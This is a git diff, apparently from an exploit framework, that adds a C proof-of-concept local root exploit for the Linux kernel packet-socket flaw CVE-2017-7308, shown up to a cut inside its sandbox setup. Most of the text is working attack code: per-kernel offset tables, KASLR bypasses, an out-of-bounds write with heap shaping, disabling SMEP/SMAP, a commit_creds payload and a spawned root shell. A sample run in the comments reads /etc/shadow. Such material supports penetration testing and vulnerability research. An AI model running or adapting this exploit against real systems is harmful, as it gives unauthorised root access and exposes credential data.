zKS!HF^r+WEY*&bP$dShk#y{k7M6Hut#CZQzvLJK0JeL5cad5#wT_8&Dod?0o!rRH_
z_w-gWeIC;*wRk0`Z`S{A#tQ>7Ll;-LL8LSAKAy_g08Z^?w)d{*bpFbG>)`U=%=q`X
zU#RxFo$--8jxf3QL&o<oz2XDSpNXGGdEgT7+#?e0&rSFP+hqz9IH8vrpT_)Gd_KhZ
z2G&QLnEpe?&EwjqjMsB{)VP@f{!_m9|6C@Z^v@~4i9crh|18FD)g?WvX>A7MlQ<nE
z|BHZA`ct<{dS%y5;{KBLONmcs{don`o74Fg@GPWc)*ByXNPRN#eO)HRe?6SeJIo&z
zN9|h13whkEWBQvJzl1BK`b7tD;)8h|=|7lWy(g`5e}(n4dAxXt>CJlnDaOk=0i|#E
zG2X*^3C$;tLyV8Bl=q9|NqYtIPJAxpj>5x_)&qKBf4-&*N+th)<8;jHX~!5pg!Z9>
z-uI$o4C~>ICOvZ+aN>_y4`0CaZth2F9L#5W^ZJsV=|ALtJ5y$>l{3C`y9CrY`#Y}h
z>#QfanYA@cU&j?a%IRFgc$O{!rO$6*ypZjaFw<Yo_~T5k<hczv*)5M9k^zdJKVte@
zH_HSTa60!fKK-W>xSsLH81H6#QuT|c7&qJD&oVwfM<&3-q4=nf_;0pL4>0{fll;8P
z_+KB9=}h4E{SY{<=VZOFivU%xvsiD;Wc%<E8BOa~>2rO5$oQ9xpSoQFX^fABJdu3<
zx<mr>-XtAoGH%ub*}%z8HuHHN)34bsqH8PVNxPWwmE2Gtaz9wY_?NkoQ1R_D#*H6I
z9Jk`AVEp1!<h{~wR|6M(HrX>;$P+U1;ouObuz?S_ap`gutzNOpRpzW%?Q-F+c+g#m
z!?g@v65&Izq|~__1l9O3zZTvWydjs-;PTYNcUl;+sspat`aqSt-UUaDp|HyxY1ZIv
z49*4c0r;%>^XJahD8S{bZl=5WT1^Pv7+lqnhK3d`P<0JH6bC+UzA8@1@?udMnYp?f
z$c4Os$XukyMwhDwZVg<nS@Y&yRG^WU5>E>`a%>6Xi*u?b{BT6P;aPL$7A!y>^}Z^P
zOE`#wdpn;W;i4q@2*Rh{{(uWE7sPko2!XpnICjDXMZ$^Fg!2zq$V(txh6Uj<Aq;Ph
zxMSyvL`B{JB{h9Ejw|-shbzPh)%)P%M4;dU&JA$0hZA|X#Hr2*h}gaw7kRBP0)V~E
z2!J~k@KIbS_nLGg+zjA?JP*>n@QsIyCb!QB`Y1)^QV*9^<WGViRHDHh-l(~QL3t7O
zfp7GAJ3=FV3PZ#Cy&B=w)u<A1Tnm>Zi939e?;%oz)j%G?RGXTb`bfBrF35Ev&VibG
z`PT)PaMf@Y2{{S@ffoU~fo}-hG}Z*+XwsnO3I>8MxcSg(8Vpy27zSM2)C9HWYG17n
zeqJQ8i`+UQ4fuTsBL%dLXzwrt#OtD1NXF&Y8pHlX;$gpZV~1EFBR~Zc7tI=+zu-Ua
z;rO7*-Qtq>6bfmOWS%-IHX(H(xXj|~25LJ3gF@<r`%sDa6ObRyLxDl~B>P=1B}pC;
z+v5o$kXj5>L8Fdb9=O15=B+|dO+)(f02vqq4~p^vE*M4fUVozxJ`BV)c~Nv3^+FKA
zA)f~vk%&fePeEt`Up?3>u2BWy>Hv{(_Epp0hH$OsDrpwQ68;|$SOb502C*8~bn-R_
zp&2{^)`IzY=x7(_FMz`_MI?Oyh3imY>O)|H#|XKFjMtN2$_5CdaJ>qy2%jX3!0Rhy
zHGe_gMH(ER(8YWWU4SkwBmoY1Ts2MAs7yU|9T&1;6uwY2@;)fJJ$LT>0ugWS+za!N
zdri<&kACf|X`vRRJZt?`K7(#NfnW>W(sfM;6%%cY9$&?k#RWmW0KBc@+~BTm^a-JF
zfNK=di5sZzP@6VXLB5)(!r%n_#X>y_L7g=>Z^3+ohN(3W+5~mhP=$+NAna>)!KX$O
zWhVT|Bx7#F2)W?&#0UjQ&XTA_2&ZO-(Nk;c-L)hHLj<9&a5v$G(<aMsmcWo())O&&
za7)`z<)y9wW>#}2$7MqRiE(C9(#aQxAR|9D5RfKugFf#I(C{HRhXxS$B=SkY<TWYj
zR=A#2_s|%!6AJ)bCikY|I>MRM1S1C3xkd#+2f3ie0HN@*AJYZ*-Jt5ILGH4u!-0LW
zzsaWakn6laxZdlf7A6Ntb8v>7z}*NbH$tnRh4TyM%oAE2bpt7G=O?59BuyBCWt)@3
z%0^jq$pyHvqP7ss5e{4B;3O|yE>diQO_Vq2T*X%{x0gGMs3jl)P@5sBE_9N?fEeun
z2?dZuQ(CrSslCj#V%f3^_-I~jUs_f|W<U~|iYW(8HAJww11YO9t;SsyRwK^97$-Z5
z1~;g1#^a)q3Pu2Wx8bRC!LM*_tv5u(%I_u`DCA1G4n~#24Uq+`=O`~RR=9*uE6Nvx
zI|@SM2Lf5AxX49PAW-EZuR|f1bO`Ddk->AgIiz7h^hRK!o>Vgm9~jw_hdHXL(261n
z%8Q2&my1Si3dR5p_s|F@8H@NyX{qsEL;}H}TqOy04FuOUd60?}1Ke^ga0Nd%ViZG%
zBO6OfhmdAsh%!46lBCW~;w35tkIy1Hm10maxZ5C53Kd0`mI=H#n;J!QnqUiP8ymzZ
zg)6G9sH@Ahy1d9G%{1vgmI};_V4G4IaY_#;?MNA6>|&z@!wC7%cCr6eQEzS*PtZlJ
z1gFx_oA8#6OWAI6@W@NnZn9C}qAfA*OC%zjDM=4Db3i@Ps}2WT>^4ZMWMJt2E*^~C
z=y+^vQ2<nyUrM6z?Cc^#h{{VNh!{<YMo3(;z{yq=4&kJggcw7sn&cK>c7QfX)8LM{
z&tfEO@c~l}fn-bIq{JwM8yd#}al^a(@PQO&!6LPzi2+{t8+VcCai|e;Ek>$@#6j{V
zL_7f^x(-<oviic8HIh!)C)@@?N76MJK!~O)n?#t@9EpJp{RfsW=vA*KvjDeb=Z9SZ
zKNx}XURJVdc}baTslB2EDyG&eO#-+Z9?;UFq{0rt6)AkQ4%rM9j*_x6KvMKiW(9Rf
zSGdj#AreCgi!+#ky1*Vx7B^99aAjaH6_z|w4;wVFkdZ`ogErWp7vVGzl18T~1F1)N
z%ojLG4*8r<QdX3)Fgtk!107mOn0vS+*I1HgLSv(|P_lB^NLV$X6ZXH0tbd_ck~A}#
zIMnPSXYZnM2Pti-OvB`&I|8*u;^1x!*0qFPLJ^4urkV-|UG4@X(8zNrFcDtE#6*VY
zFJ|)=g_45{x$Kr%qv&MaAw-H<P*k~rOk^LpR8ZhzTVKq16j?YNWN8%AEBxluNRSwD
z)L=j$_zg$fLQP>pE4mWgkBi=97D(B&WCslteZWn*%TLKjJ0qb^AT?wbA)qQuT?{p&
zDj+35QV9qNMnp{7RM#5B@{Lll30^00TK0OLY*G2i;K5l=R9)nLSlT7Ps_VmZ<Xn_;
zWh<916FQY5DpO1ogNtN=D3ug{5<76dXw^JdaY==9RY|dHjlJxO5>2Xlq`*cnuEZ38
zrUVcOn&Sx*2&0MY063A0cL<M~k7806s785N#U_OiS49)Kl=pO$Um2d7FYFQuXR!3r
z^q7hxEOE{ZX(Td}Ll$fdo}mu(X_i205@ANM**HKjgh&WOmkBkOms}rWz7hyl!PbFv
zp(xZ#sF>&@!UegU*rSACsk9j&-U(YoN`<idh$LZYnHMEQvY5`w;RZ<w>%>LcQ8HbQ
zO5lT-hzN3a>MqPHG(OoayjUS)K?FqIX+(gElQSO#ac7hBYK<il)e+XEF#MB67S$C^
zhKNZWnx>khA4vZXp&nSzhwHE=f`|ii2%%`}LQ?%AgcTQ7D}>@A=1MML$b}uqCN&5L
zECe~@JV{ma94fKmKyeIV_~T0HQ4BTE{bJTb{1D3^#B`wsc=9IfOlgvd?hZ-UW?|P0
znuyM#Mi%Efb%ot2>a<zaEq;*5vk}s0mk~FC+APv_+N>bvV%Qx*n?(-%wOM4<gD4>6
zYnHdpCDzWgSz-+gsbByL;{@rWlt3s_h9gOjM#)feGFY1hRfKrh1%SM#{@)+;{EnVI
z@MF%z^M3W*Up*I6;cA^$Js+EbxU_Vs!j+#6b<RT=9keb>ORy@wdLBf}q!gy&Z|8Md
zb;jeCK?esXuzXxmSyX)G_d}hPKOz-w&VM1|Qkui@6Njo8pZT$k3Kg`88(iFqUvhlq
zM<j7hCdPFZ->b9T6kq3j)miaLC8Nr(?&-O5a{lUhj5<$!SW(Ke%2%N)P4U%pQFS)w
zM|mY5Yj8uD;;-^^qRt<iDxfDv#x=bbksM$7Ls92>sy#TKxjc0oU#<HqzbR`E$Oz{8
zn&Z>sTgqR>SN>J%{>}J}rufPaOY^@OzYXz8_Ei4LUrPtaFJy+Ra8-U)FM7O@Tz=)(
zW#6j^z_CD{5`R^Eb^Z=QlH+R!bxC_ro=nY`=)Wrd4@~jZ`>Hy}&rt=J$!R*D)rlU5
zP+E$t@{lfq9EZe7+hOW}GE|1q-|hHO`Sb8gK2&@>UL14~EgkAi;VN$tz<<*D1=L?8
wgSb}l6ioL@_7z6wN-lrlY>Cq2^iT0qd{cZK0c@!Jx2MXSym$_je3<k9KYpMHMgRZ+

literal 0
HcmV?d00001

diff --git a/data/exploits/cve-2017-7308/poc.c b/data/exploits/cve-2017-7308/poc.c
new file mode 100644
index 0000000000..713e7cb98c
--- /dev/null
+++ b/data/exploits/cve-2017-7308/poc.c
@@ -0,0 +1,781 @@
+// A proof-of-concept local root exploit for CVE-2017-7308.
+// Includes a SMEP & SMAP bypass.
+// Tested on Ubuntu / Linux Mint:
+// - 4.8.0-34-generic
+// - 4.8.0-36-generic
+// - 4.8.0-39-generic
+// - 4.8.0-41-generic
+// - 4.8.0-42-generic
+// - 4.8.0-44-generic
+// - 4.8.0-45-generic
+// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308
+//
+// Usage:
+// user@ubuntu:~$ uname -a
+// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...
+// user@ubuntu:~$ gcc pwn.c -o pwn
+// user@ubuntu:~$ ./pwn 
+// [.] starting
+// [.] system has 2 processors
+// [.] checking kernel version
+// [.] kernel version '4.8.0-41-generic' detected
+// [~] done, version looks good
+// [.] checking SMEP and SMAP
+// [~] done, looks good
+// [.] setting up namespace sandbox
+// [~] done, namespace sandbox set up
+// [.] KASLR bypass enabled, getting kernel addr
+// [.] done, kernel text:   ffffffff87000000
+// [.] commit_creds:        ffffffff870a5cf0
+// [.] prepare_kernel_cred: ffffffff870a60e0
+// [.] native_write_cr4:    ffffffff87064210
+// [.] padding heap
+// [.] done, heap is padded
+// [.] SMEP & SMAP bypass enabled, turning them off
+// [.] done, SMEP & SMAP should be off now
+// [.] executing get root payload 0x401516
+// [.] done, should be root now
+// [.] checking if we got root
+// [+] got r00t ^_^
+// root@ubuntu:/home/user# cat /etc/shadow
+// root:!:17246:0:99999:7:::
+// daemon:*:17212:0:99999:7:::
+// bin:*:17212:0:99999:7:::
+// ...
+//
+// Andrey Konovalov <andreyknvl@gmail.com>
+// ---
+// Updated by <bcoles@gmail.com>
+// - support for systems with SMEP but no SMAP
+// - check number of CPU cores
+// - additional kernel targets
+// - additional KASLR bypasses
+// https://github.com/bcoles/kernel-exploits/tree/cve-2017-7308
+
+#define _GNU_SOURCE
+
+#include <assert.h>
+#include <fcntl.h>
+#include <stdarg.h>
+#include <stdbool.h>
+#include <stddef.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sched.h>
+
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#include <sys/sysinfo.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+#include <sys/wait.h>
+
+#include <arpa/inet.h>
+#include <linux/if_packet.h>
+#include <linux/ip.h>
+#include <linux/udp.h>
+#include <netinet/if_ether.h>
+#include <net/if.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#       define dprintf printf
+#else
+#       define dprintf
+#endif
+
+#define ENABLE_KASLR_BYPASS		1
+#define ENABLE_SMEP_SMAP_BYPASS		1
+
+char *SHELL = "/bin/bash";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS
+unsigned long KERNEL_BASE = 		0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+struct kernel_info {
+	const char* version;
+	uint64_t commit_creds;
+	uint64_t prepare_kernel_cred;
+	uint64_t native_write_cr4;
+};
+
+struct kernel_info kernels[] = {
+	{ "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x64210 },
+	{ "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x64210 },
+	{ "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+	{ "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+	{ "4.8.0-42-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+	{ "4.8.0-44-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+	{ "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x64210 },
+};
+
+// Used to get root privileges.
+#define COMMIT_CREDS			(KERNEL_BASE + kernels[kernel].commit_creds)
+#define PREPARE_KERNEL_CRED		(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
+#define NATIVE_WRITE_CR4		(KERNEL_BASE + kernels[kernel].native_write_cr4)
+
+// Will be overwritten if ENABLE_SMEP_SMAP_BYPASS
+unsigned long CR4_DESIRED_VALUE =	0x406e0ul;
+
+#define KMALLOC_PAD			512
+#define PAGEALLOC_PAD			1024
+
+// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *
+
+typedef uint32_t u32;
+
+// $ pahole -C hlist_node ./vmlinux
+struct hlist_node {
+	struct hlist_node *        next;                 /*     0     8 */
+	struct hlist_node * *      pprev;                /*     8     8 */
+};
+
+// $ pahole -C timer_list ./vmlinux
+struct timer_list {
+	struct hlist_node          entry;                /*     0    16 */
+	long unsigned int          expires;              /*    16     8 */
+	void                       (*function)(long unsigned int); /*    24     8 */
+	long unsigned int          data;                 /*    32     8 */
+	u32                        flags;                /*    40     4 */
+	int                        start_pid;            /*    44     4 */
+	void *                     start_site;           /*    48     8 */
+	char                       start_comm[16];       /*    56    16 */
+};
+
+// packet_sock->rx_ring->prb_bdqc->retire_blk_timer
+#define TIMER_OFFSET	896
+
+// pakcet_sock->xmit
+#define XMIT_OFFSET	1304
+
+// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *
+
+void packet_socket_rx_ring_init(int s, unsigned int block_size,
+		unsigned int frame_size, unsigned int block_nr,
+		unsigned int sizeof_priv, unsigned int timeout) {
+	int v = TPACKET_V3;
+	int rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));
+	if (rv < 0) {
+		dprintf("[-] setsockopt(PACKET_VERSION)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	struct tpacket_req3 req;
+	memset(&req, 0, sizeof(req));
+	req.tp_block_size = block_size;
+	req.tp_frame_size = frame_size;
+	req.tp_block_nr = block_nr;
+	req.tp_frame_nr = (block_size * block_nr) / frame_size;
+	req.tp_retire_blk_tov = timeout;
+	req.tp_sizeof_priv = sizeof_priv;
+	req.tp_feature_req_word = 0;
+
+	rv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
+	if (rv < 0) {
+		dprintf("[-] setsockopt(PACKET_RX_RING)\n");
+		exit(EXIT_FAILURE);
+	}
+}
+
+int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
+		unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
+	int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+	if (s < 0) {
+		dprintf("[-] socket(AF_PACKET)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
+		sizeof_priv, timeout);
+
+	struct sockaddr_ll sa;
+	memset(&sa, 0, sizeof(sa));
+	sa.sll_family = PF_PACKET;
+	sa.sll_protocol = htons(ETH_P_ALL);
+	sa.sll_ifindex = if_nametoindex("lo");
+	sa.sll_hatype = 0;
+	sa.sll_pkttype = 0;
+	sa.sll_halen = 0;
+
+	int rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));
+	if (rv < 0) {
+		dprintf("[-] bind(AF_PACKET)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	return s;
+}
+
+void packet_socket_send(int s, char *buffer, int size) {
+	struct sockaddr_ll sa;
+	memset(&sa, 0, sizeof(sa));
+	sa.sll_ifindex = if_nametoindex("lo");
+	sa.sll_halen = ETH_ALEN;
+
+	if (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,
+			sizeof(sa)) < 0) {
+		dprintf("[-] sendto(SOCK_RAW)\n");
+		exit(EXIT_FAILURE);
+	}
+}
+
+void loopback_send(char *buffer, int size) {
+	int s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
+	if (s == -1) {
+		dprintf("[-] socket(SOCK_RAW)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	packet_socket_send(s, buffer, size);
+}
+
+int packet_sock_kmalloc() {
+	int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));
+	if (s == -1) {
+		dprintf("[-] socket(SOCK_DGRAM)\n");
+		exit(EXIT_FAILURE);
+	}
+	return s;
+}
+
+void packet_sock_timer_schedule(int s, int timeout) {
+	packet_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);
+}
+
+void packet_sock_id_match_trigger(int s) {
+	char buffer[16];
+	packet_socket_send(s, &buffer[0], sizeof(buffer));
+}
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+
+#define ALIGN(x, a)			__ALIGN_KERNEL((x), (a))
+#define __ALIGN_KERNEL(x, a)		__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)
+#define __ALIGN_KERNEL_MASK(x, mask)	(((x) + (mask)) & ~(mask))
+
+#define V3_ALIGNMENT	(8)
+#define BLK_HDR_LEN	(ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))
+
+#define ETH_HDR_LEN	sizeof(struct ethhdr)
+#define IP_HDR_LEN	sizeof(struct iphdr)
+#define UDP_HDR_LEN	sizeof(struct udphdr)
+
+#define UDP_HDR_LEN_FULL	(ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)
+
+int oob_setup(int offset) {
+	unsigned int maclen = ETH_HDR_LEN;
+	unsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +
+				(maclen < 16 ? 16 : maclen));
+	unsigned int macoff = netoff - maclen;
+	unsigned int sizeof_priv = (1u<<31) + (1u<<30) +
+		0x8000 - BLK_HDR_LEN - macoff + offset;
+	return packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);
+}
+
+void oob_write(char *buffer, int size) {
+	loopback_send(buffer, size);
+}
+
+void oob_timer_execute(void *func, unsigned long arg) {
+	oob_setup(2048 + TIMER_OFFSET - 8);
+
+	int i;
+	for (i = 0; i < 32; i++) {
+		int timer = packet_sock_kmalloc();
+		packet_sock_timer_schedule(timer, 1000);
+	}
+
+	char buffer[2048];
+	memset(&buffer[0], 0, sizeof(buffer));
+
+	struct timer_list *timer = (struct timer_list *)&buffer[8];
+	timer->function = func;
+	timer->data = arg;
+	timer->flags = 1;
+
+	oob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);
+
+	sleep(1);
+}
+
+void oob_id_match_execute(void *func) {
+	int s = oob_setup(2048 + XMIT_OFFSET - 64);
+
+	int ps[32];
+
+	int i;
+	for (i = 0; i < 32; i++)
+		ps[i] = packet_sock_kmalloc();
+
+	char buffer[2048];
+	memset(&buffer[0], 0, 2048);
+
+	void **xmit = (void **)&buffer[64];
+	*xmit = func;
+
+	oob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);
+
+	for (i = 0; i < 32; i++)
+		packet_sock_id_match_trigger(ps[i]);
+}
+
+// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *
+
+void kmalloc_pad(int count) {
+	int i;
+	for (i = 0; i < count; i++)
+		packet_sock_kmalloc();
+}
+
+void pagealloc_pad(int count) {
+	packet_socket_setup(0x8000, 2048, count, 0, 100);
+}
+
+// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
+
+typedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
+typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
+
+void get_root_payload(void) {
+	((_commit_creds)(COMMIT_CREDS))(
+		((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
+	);
+}
+
+// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+	int f = open(file, O_RDONLY);
+	if (f == -1)
+		return -1;
+	int bytes_read = 0;
+	while (true) {
+		int bytes_to_read = CHUNK_SIZE;
+		if (bytes_to_read > max_length - bytes_read)
+			bytes_to_read = max_length - bytes_read;
+		int rv = read(f, &buffer[bytes_read], bytes_to_read);
+		if (rv == -1)
+			return -1;
+		bytes_read += rv;
+		if (rv == 0)
+			return bytes_read;
+	}
+}
+
+void get_kernel_version(char* output, int max_length) {
+        struct utsname u;
+        int rv = uname(&u);
+        if (rv != 0) {
+                dprintf("[-] uname())\n");
+                exit(EXIT_FAILURE);
+        }
+        assert(strlen(u.release) <= max_length);
+        strcpy(&output[0], u.release);
+}
+
+#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))
+
+#define KERNEL_VERSION_LENGTH 32
+
+void detect_versions() {
+	char version[KERNEL_VERSION_LENGTH];
+
+	get_kernel_version(&version[0], KERNEL_VERSION_LENGTH);
+
+	int i;
+	for (i = 0; i < ARRAY_SIZE(kernels); i++) {
+		if (strcmp(&version[0], kernels[i].version) == 0) {
+			dprintf("[.] kernel version '%s' detected\n", kernels[i].version);
+			kernel = i;
+			return;
+		}
+	}
+
+	dprintf("[-] kernel version not recognized\n");
+	exit(EXIT_FAILURE);
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+// 0 - nothing, 1 - SMEP, 2 - SMAP, 3 - SMEP & SMAP
+int smap_smep_enabled() {
+	char buffer[PROC_CPUINFO_LENGTH];
+	char* path = "/proc/cpuinfo";
+	int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+	if (length == -1) {
+		dprintf("[-] open/read(%s)\n", path);
+		exit(EXIT_FAILURE);
+	}
+
+	int rv = 0;
+	char* found = memmem(&buffer[0], length, "smep", 4);
+	if (found != NULL)
+		rv += 1;
+	found = memmem(&buffer[0], length, "smap", 4);
+	if (found != NULL)
+		rv += 2;
+	return rv;
+}
+
+void check_smep_smap() {
+	int rv = smap_smep_enabled();
+
+#if !ENABLE_SMEP_SMAP_BYPASS
+	if (rv >= 1) {
+		dprintf("[-] SMAP/SMEP detected, use ENABLE_SMEP_SMAP_BYPASS\n");
+		exit(EXIT_FAILURE);
+	}
+#endif
+
+	switch(rv) {
+	case 1: // SMEP
+		CR4_DESIRED_VALUE = 0x406e0ul;
+		break;
+	case 2: // SMAP
+		CR4_DESIRED_VALUE = 0x407f0ul;
+		break;
+	case 3: // SMEP and SMAP
+		CR4_DESIRED_VALUE = 0x407f0ul;
+		break;
+	}
+}
+
+// * * * * * * * * * * * * * Syslog KASLR bypass * * * * * * * * * * * * * * *
+
+#define SYSLOG_ACTION_READ_ALL 3
+#define SYSLOG_ACTION_SIZE_BUFFER 10
+
+unsigned long get_kernel_addr_syslog() {
+	dprintf("[.] trying syslog...\n");
+
+	int size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);
+	if (size == -1) {
+		dprintf("[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	size = (size / getpagesize() + 1) * getpagesize();
+	char *buffer = (char *)mmap(NULL, size, PROT_READ|PROT_WRITE,
+		MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
+
+	size = klogctl(SYSLOG_ACTION_READ_ALL, &buffer[0], size);
+	if (size == -1) {
+		dprintf("[-] klogctl(SYSLOG_ACTION_READ_ALL)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	const char *needle1 = "Freeing SMP";
+	char *substr = (char *)memmem(&buffer[0], size, needle1, strlen(needle1));
+	if (substr == NULL) {
+		dprintf("[-] substring '%s' not found in dmesg\n", needle1);
+		exit(EXIT_FAILURE);
+	}
+
+	for (size = 0; substr[size] != '\n'; size++);
+
+	const char *needle2 = "ffff";
+	substr = (char *)memmem(&substr[0], size, needle2, strlen(needle2));
+	if (substr == NULL) {
+		dprintf("[-] substring '%s' not found in dmesg\n", needle2);
+		exit(EXIT_FAILURE);
+	}
+
+	char *endptr = &substr[16];
+	unsigned long r = strtoul(&substr[0], &endptr, 16);
+
+	r &= 0xfffffffffff00000ul;
+	r -= 0x1000000ul;
+
+	return r;
+}
+
+// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_kallsyms() {
+	FILE *f;
+	unsigned long addr = 0;
+	char dummy;
+	char sname[256];
+	char* name = "startup_64";
+	char* path = "/proc/kallsyms";
+
+	dprintf("[.] trying %s...\n", path);
+	f = fopen(path, "r");
+	if (f == NULL) {
+		dprintf("[-] open/read(%s)\n", path);
+		return 0;
+	}
+
+	int ret = 0;
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	dprintf("[-] kernel base not found in %s\n", path);
+	return 0;
+}
+
+// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr_sysmap() {
+	FILE *f;
+	unsigned long addr = 0;
+	char path[512] = "/boot/System.map-";
+	char version[32];
+	get_kernel_version(&version[0], 32);
+	strcat(path, &version[0]);
+	dprintf("[.] trying %s...\n", path);
+	f = fopen(path, "r");
+	if (f == NULL) {
+		dprintf("[-] open/read(%s)\n", path);
+		return 0;
+	}
+
+	char dummy;
+	char sname[256];
+	char* name = "startup_64";
+	int ret = 0;
+	while (ret != EOF) {
+		ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
+		if (ret == 0) {
+			fscanf(f, "%s\n", sname);
+			continue;
+		}
+		if (!strcmp(name, sname)) {
+			fclose(f);
+			return addr;
+		}
+	}
+
+	fclose(f);
+	dprintf("[-] kernel base not found in %s\n", path);
+	return 0;
+}
+
+// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *
+
+unsigned long get_kernel_addr() {
+	unsigned long addr = 0;
+
+	addr = get_kernel_addr_kallsyms();
+        if (addr) return addr;
+
+	addr = get_kernel_addr_sysmap();
+	if (addr) return addr;
+
+	addr = get_kernel_addr_syslog();
+	if (addr) return addr;
+
+	dprintf("[-] KASLR bypass failed\n");
+	exit(EXIT_FAILURE);
+
+	return 0;
+}
+
+// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *
+
+void check_procs() {
+	int min_procs = 2;
+
+	int nprocs = 0;
+	nprocs = get_nprocs_conf();
+
+	if (nprocs < min_procs) {
+		dprintf("[-] system has less than %d processor cores\n", min_procs);
+		exit(EXIT_FAILURE);
+	}
+
+	dprintf("[.] system has %d processors\n", nprocs);
+}
+
+void exec_shell() {
+	int fd;
+
+	fd = open("/proc/1/ns/net", O_RDONLY);
+	if (fd == -1) {
+		dprintf("error opening /proc/1/ns/net\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (setns(fd, CLONE_NEWNET) == -1) {
+		dprintf("error calling setns\n");
+		exit(EXIT_FAILURE);
+	}
+
+	system(SHELL);
+}
+
+void fork_shell() {
+	pid_t rv;
+
+	rv = fork();
+	if (rv == -1) {
+		dprintf("[-] fork()\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (rv == 0) {
+		exec_shell();
+	}
+}
+
+bool is_root() {
+	// We can't simple check uid, since we're running inside a namespace
+	// with uid set to 0. Try opening /etc/shadow instead.
+	int fd = open("/etc/shadow", O_RDONLY);
+	if (fd == -1)
+		return false;
+	close(fd);
+	return true;
+}
+
+void check_root() {
+	dprintf("[.] checking if we got root\n");
+
+	if (!is_root()) {
+		dprintf("[-] something went wrong =(\n");
+		return;
+	}
+
+	dprintf("[+] got r00t ^_^\n");
+
+	// Fork and exec instead of just doing the exec to avoid potential
+	// memory corruptions when closing packet sockets.
+	fork_shell();
+}
+
+bool write_file(const char* file, const char* what, ...) {
+	char buf[1024];
+	va_list args;
+	va_start(args, what);
+	vsnprintf(buf, sizeof(buf), what, args);
+	va_end(args);
+	buf[sizeof(buf) - 1] = 0;
+	int len = strlen(buf);
+
+	int fd = open(file, O_WRONLY | O_CLOEXEC);
+	if (fd == -1)
+		return false;
+	if (write(fd, buf, len) != len) {
+		close(fd);
+		return false;
+	}
+	close(fd);
+	return true;
+}
+
+void setup_sandbox() {
+	int real_uid = getuid();
+	int real_gid = getgid();
+
+        if (unshare(CLONE_NEWUSER) != 0) {
+		dprintf("[-] unshare(CLONE_NEWUSER)\n");
+		exit(EXIT_FAILURE);
+	}
+
+        if (unshare(CLONE_NEWNET) != 0) {
+		dprintf("[-] unshare(CLONE_NEWUSER)\n");
+		exit(EXIT_FAILURE);
+	}
+
+	if (!write_file("/proc/self/setgroups", "deny")) {
+		dprintf("[-] write_file(/proc/self/set_groups)\n");
+		exit(EXIT_FAILURE);
+	}
